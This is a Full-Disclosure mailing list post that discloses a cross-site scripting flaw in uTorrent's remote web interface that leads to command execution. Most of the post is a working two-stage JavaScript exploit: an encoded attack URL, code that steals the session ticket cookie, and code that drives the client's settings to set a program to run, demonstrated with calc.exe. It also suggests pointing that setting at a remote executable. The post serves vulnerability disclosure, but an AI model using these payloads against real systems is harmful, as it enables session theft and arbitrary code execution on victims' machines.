Tavis Ormandy <[email protected]> wrote: > Justin Klein Keane <[email protected]> wrote: > > > Impact - ------ Clients loading a maliciously crafted .torrent file into > > Transmission and viewing the web client could be subject to arbitrary > > script injection, allowing an attacker to run arbitrary code in the > > context of the victim's web browser. This could lead to privacy > > compromises (such as if the script "phoned home" to another URL with > > client information) or client side attacks (such as drive by downloads). > > > > I was just looking at a similar package for Windows called utorrent. They > relay the remote administration through a third party, presumably to help > non-technical users understand NAT traversal. > > Similar problems exist, but you can use it to set configuration options > that result in command execution. I guess this problem is public as their > contact address is a public bug tracking system (mea culpa). > > I have a working demo for command execution, email me off-list if you want > it (I'm reluctant to send too much information about windows software to > the list, as journalists tend to abuse it, email me if you need > specifics). > > Tavis. >
Too many requests, I've included details below. Don't get too excited, it's not very interesting. I suppose it's worth documenting as another example of XSS to native code execution, although it's more academic than a realistic threat as nobody is likely to use this with an expectation of security. The problem is that any XSS on remote.utorrent.com (or presumably if you're a mitm with sslstrip) is equivalent to code execution if the "remote" option has been enabled in the preferences dialog (Assuming the user is logged in, of course). As with any non-trivial web application, these are not difficult to find, even for non-web specialists like me. Once you have an XSS, explotation is relatively straightforward. - Read the bt_talon_tkt cookie from remote.utorrent.com - Resolve the ticket to a raptor using XHR to 'https://remote.utorrent.com/talon/getinfo?bt_talon_tkt=' + encodeURIComponent(ticket); - Exploit the same XSS on the raptor, allowing you interact with the application. The most obvious attack is to set the "state_cmd" option to whatever command you require (I assume \\remotehost\whatever.exe will work via the webdav redirector, but I didn't test it). Here is the demo I sent to the vendor, I don't know if it works for all cases https://remote.utorrent.com/send?btih=DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF&dn=ignored&message=';eval(unescape(document.location.hash.substring(1)));//#var%20ticket%3Bdocument.cookie.split%28%27%3B%27%29.forEach%28function%28cookie%29% 7Bticket%3Dcookie.indexOf%28%27bt_talon_tkt%27%29%21%3D-1%3FencodeURIComponent%28cookie.split%28unescape%28%27%2522%27%29%29%5B1%5D%29%3Aticket%7D%29%3Bx%3Dnew%20XMLHttpRequest%28%29%3Bx.open%28%27GET%27%2C%27/talon/getinfo%3Fbt_talon_tkt %3D%27+ticket%2Cfalse%29%3Bx.send%28%29%3Braptor%3Deval%28%27%28%27%20+%20x.responseText%20+%20%27%29%27%29.raptor%3Bdocument.location%3Draptor.replace%28%27http%3A%27%2C%27https%3A%27%29.replace%28%279090%27%2C%279000%27%29+unescape%28%2 7/send%253Fbtih%253DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%2526dn%253Dignored%2526message%253D%2527%253Beval%2528unescape%2528document.location.hash.substring%25281%2529%2529%2529%253B//%2523f%25253Ddocument.createElement%252528%252527I FRAME%252527%252529%25253Bf.src%25253D%252527/talon/gui%25253Futorrent%25253D1%252527%25253Bdocument.body.appendChild%252528f%252529%25253BsetTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.uki%252 528%252527%252523toolbar_preferences%252527%252529.trigger%252528%252527mousedown%252527%25252C%252520%25257Bwhich%252520%25253A%2525201%25257D%252529%252520%25257D%25252C%2525205000%252529%25253B%252520setTimeout%252528function%252520%25 2528%252529%252520%25257B%252520f.contentDocument.window.utWebUI.stpanes.show%252528%252527dlgSettings-RunProgram%252527%252529%252520%25257D%25252C%2525206000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%2525 7B%252520f.contentDocument.window.document.getElementById%252528%252527state_cmd%252527%252529.value%25253D%252527C%25253A%25255C%25255CWINDOWS%25255C%25255CSYSTEM32%25255C%25255CCALC.EXE%252527%252520%25257D%25252C%2525207000%252529%2525 3B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527DLG_SETTINGS_SAVE%252527%252529.click%252528%252529%25253B%252520%25257D%25252C%2525208000%252529%25 253B%27%29%3B Wait a few seconds, then check the preferences pane of the client to see if the new setting has set. The escaped text is the following inelegant code: Stage 1 payload: var ticket; document.cookie.split(';').forEach(function (cookie) { ticket = cookie.indexOf('bt_talon_tkt') != -1 ? encodeURIComponent(cookie.split(unescape('%22'))[1]) : ticket }); x = new XMLHttpRequest(); x.open('GET', '/talon/getinfo?bt_talon_tkt=' + ticket, false); x.send(); raptor = eval('(' + x.responseText + ')').raptor; document.location = raptor.replace('http:','https:') .replace('9090','9000') + unescape('/send%3Fbtih%3DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%26dn%3Dignored%26message%3D%27%3Beval%28unescape%28document.location.hash.substring%281%29%29%29%3B//%23f%253Ddocument.createElement%2528%25 27IFRAME%2527%2529%253Bf.src%253D%2527/talon/gui%253Futorrent%253D1%2527%253Bdocument.body.appendChild%2528f%2529%253BsetTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.uki%2528%2527%2523toolbar_preferences%2527 %2529.trigger%2528%2527mousedown%2527%252C%2520%257Bwhich%2520%253A%25201%257D%2529%2520%257D%252C%25205000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.utWebUI.stpanes.show%2528%2527dlgSetti ngs-RunProgram%2527%2529%2520%257D%252C%25206000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527state_cmd%2527%2529.value%253D%2527C%253A%255C%255CWINDOWS%255C% 255CSYSTEM32%255C%255CCALC.EXE%2527%2520%257D%252C%25207000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527DLG_SETTINGS_SAVE%2527%2529.click%2528%2529%253B%2520 %257D%252C%25208000%2529%253B'); Stage 2 payload: f = document.createElement('IFRAME'); f.src = '/talon/gui?utorrent=1'; document.body.appendChild(f); setTimeout(function () { f.contentDocument.window.uki('#toolbar_preferences').trigger('mousedown', {which : 1}) }, 5000); setTimeout(function () { f.contentDocument.window.utWebUI.stpanes.show('dlgSettings-RunProgram') }, 6000); setTimeout(function () { f.contentDocument.window.document.getElementById('state_cmd').value='C:\\WINDOWS\\SYSTEM32\\CALC.EXE' }, 7000); setTimeout(function () { f.contentDocument.window.document.getElementById('DLG_SETTINGS_SAVE').click(); }, 8000); I'm sure javascript programmers will cringe at my code, my apologies. Tavis. -- ------------------------------------- [email protected] | pgp encrypted mail preferred ------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
